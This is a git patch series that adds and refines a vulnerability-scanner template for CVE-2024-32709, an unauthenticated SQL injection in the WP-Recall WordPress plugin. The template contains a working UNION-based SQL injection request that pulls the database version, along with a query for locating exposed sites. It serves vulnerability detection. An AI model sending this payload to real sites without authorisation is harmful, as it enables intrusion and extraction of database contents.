From 72dc8530d490338725c6be8cafd305a0389f3542 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 25 Jun 2024 23:53:24 +0300 Subject: [PATCH 1/4] add cve-2024-32709 --- http/cves/2024/CVE-2024-32709.yaml | 39 ++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32709.yaml diff --git a/http/cves/2024/CVE-2024-32709.yaml b/http/cves/2024/CVE-2024-32709.yaml new file mode 100644 index 0000000000..8db967382e --- /dev/null +++ b/http/cves/2024/CVE-2024-32709.yaml @@ -0,0 +1,39 @@ +id: CVE-2024-32709 + +info: + name: WP-Recall <= 16.26.5 - SQL Injection + author: securityforeveryone + severity: critical + description: | + The WP-Recall Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 16.26.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-32709 + - https://github.com/truonghuuphuc/CVE-2024-32709-Poc + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L + cvss-score: 9.3 + cve-id: CVE-2024-32709 + cwe-id: CWE-89 + epss-score: 0.00043 + epss-percentile: 0.0866 + tags: cve,cve2024,wp-plugin,wp-recall +variables: + num: "999999999" + +http: + - raw: + - | + GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5(num)}}' + + - type: status + status: + - 200 From 71e274bb81fb6d70a1560efca7e7b5dcd2923da4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 26 Jun 2024 02:32:39 +0530 Subject: [PATCH 2/4] minor-update --- http/cves/2024/CVE-2024-32709.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32709.yaml b/http/cves/2024/CVE-2024-32709.yaml index 8db967382e..f3654aa060 100644 --- a/http/cves/2024/CVE-2024-32709.yaml +++ b/http/cves/2024/CVE-2024-32709.yaml @@ -10,6 +10,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-32709 - https://github.com/truonghuuphuc/CVE-2024-32709-Poc + - https://patchstack.com/database/vulnerability/wp-recall/wordpress-wp-recall-plugin-16-26-5-sql-injection-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L cvss-score: 9.3 @@ -17,7 +18,12 @@ info: cwe-id: CWE-89 epss-score: 0.00043 epss-percentile: 0.0866 - tags: cve,cve2024,wp-plugin,wp-recall + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/wp-recall/" + tags: cve,cve2024,wp-plugin,wp-recall,wordpress + variables: num: "999999999" From c026e34a0262b715ea648be0fb2bfc7eae22180f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 27 Jun 2024 16:50:34 +0530 Subject: [PATCH 3/4] minor update --- http/cves/2024/CVE-2024-32709.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32709.yaml b/http/cves/2024/CVE-2024-32709.yaml index f3654aa060..77409c450d 100644 --- a/http/cves/2024/CVE-2024-32709.yaml +++ b/http/cves/2024/CVE-2024-32709.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/wp-recall/" - tags: cve,cve2024,wp-plugin,wp-recall,wordpress + tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp variables: num: "999999999" From 981afc29e8feffd17df55866f64ee64f84b24554 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Jul 2024 11:30:12 +0530 Subject: [PATCH 4/4] Update CVE-2024-32709.yaml --- http/cves/2024/CVE-2024-32709.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32709.yaml b/http/cves/2024/CVE-2024-32709.yaml index 77409c450d..575f296b2a 100644 --- a/http/cves/2024/CVE-2024-32709.yaml +++ b/http/cves/2024/CVE-2024-32709.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/wp-recall/" - tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp + tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp,sqli variables: num: "999999999"